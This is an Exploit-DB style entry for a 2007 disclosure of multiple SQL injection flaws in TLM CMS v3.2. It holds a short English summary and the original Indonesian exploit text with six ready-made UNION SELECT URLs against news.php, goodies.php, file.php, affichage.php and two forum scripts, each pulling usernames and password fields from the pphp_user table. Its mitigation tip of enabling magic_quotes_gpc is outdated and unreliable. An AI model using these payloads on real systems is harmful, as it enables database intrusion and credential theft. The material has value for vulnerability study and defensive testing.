TLM CMS v3.2 - Multiple Remote SQL Injection Vulnerabilities

vendor:

TLM CMS

by:

k1tk4t

7.5

CVSS

HIGH

Multiple Remote SQL Injection

CWE

Product Name: TLM CMS

Affected Version From: TLM CMS v3.2

Affected Version To: TLM CMS v3.2

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

TLM CMS v3.2 – Multiple Remote SQL Injection Vulnerabilities

The TLM CMS v3.2 is vulnerable to multiple remote SQL injection attacks. The vulnerability allows an attacker to manipulate SQL queries and potentially gain unauthorized access to the database. The affected files include 'news.php', 'goodies.php', 'file.php', 'affichage.php', '/mod_forum/afficher.php', and '/mod_forum/messages.php'. The exploit URLs are provided in the text.

Mitigation:

To mitigate these vulnerabilities, it is recommended to update the TLM CMS to a patched version or apply the necessary security patches provided by the vendor. Additionally, enabling magic_quotes_gpc can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

########################################################################
# TLM CMS v3.2 - Multiple Remote SQL Injection Vulnerabilities
# Vendor           : http://tlm.hebserv.fr/
# Download         : http://tlm.hebserv.fr/mod_file/upload/tlmcms32.zip
# Ditemukan oleh   : k1tk4t - k1tk4t[4t]newhack.org
# Lokasi           : Indonesia  --  #newhack[dot]org @ irc.dal.net
########################################################################
Kutu pada berkas 'news.php';
http://localhost/tlmcms32/news.php?act=lirenews&id=-9%20UNION%20SELECT%200,US_pseudo,US_pwd,0,0,0,0,0,0,0%20from%20pphp_user/*

Kutu pada berkas 'goodies.php';
http://localhost/tlmcms32/goodies.php?act=lire&idnews=-9%20UNION%20SELECT%200,0,0,US_pseudo,US_pwd,0,0,0,0,0,0%20from%20pphp_user/*

<-------------------------->
Jika magic_quotes_gpc = off, maka pada berkas2 berikut dapat memanipulasi
SQL query;

Kutu pada berkas 'file.php';
http://localhost/tlmcms32/file.php?action=voir&id=-9'UNION%20SELECT%200,0,0,US_pseudo,0,US_pwd,0,0,0,0%20from%20pphp_user/*

Kutu pada berkas 'affichage.php';
http://localhost/tlmcms32/affichage.php?ID=-9'UNION%20SELECT%200,0,0,US_pseudo,US_pwd%20from%20pphp_user/*

Kutu pada berkas '/mod_forum/afficher.php';
http://localhost/tlmcms32/mod_forum/afficher.php?id_sal=-9'%20UNION%20SELECT%20US_pseudo,US_pwd,0%20from%20pphp_user/*

Kutu pada berkas '/mod_forum/messages.php';
http://localhost/tlmcms32/mod_forum/messages.php?id_sujet=-9'UNION%20SELECT%20US_pseudo,0%20from%20pphp_user/*

########################################################################
Terimakasih untuk;
str0ke, DNX
xoron,iFX,x-ace,nyubi,arioo,selikoer,k1ngk0ng,aldy_BT,adhietslank
dan semua temen2 komunitas security&hacking
-----------------------
-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all member newhack[dot]org
-----------------------
all member www.echo.or.id
-----------------------
all member www.yogyafree.net
-----------------------
all member www.sekuritionline.net
-----------------------
all member www.kecoak-elektronik.net
-----------------------
semua komunitas hacker&security Indonesia
Cintailah Bahasa Indonesia

# milw0rm.com [2007-09-08]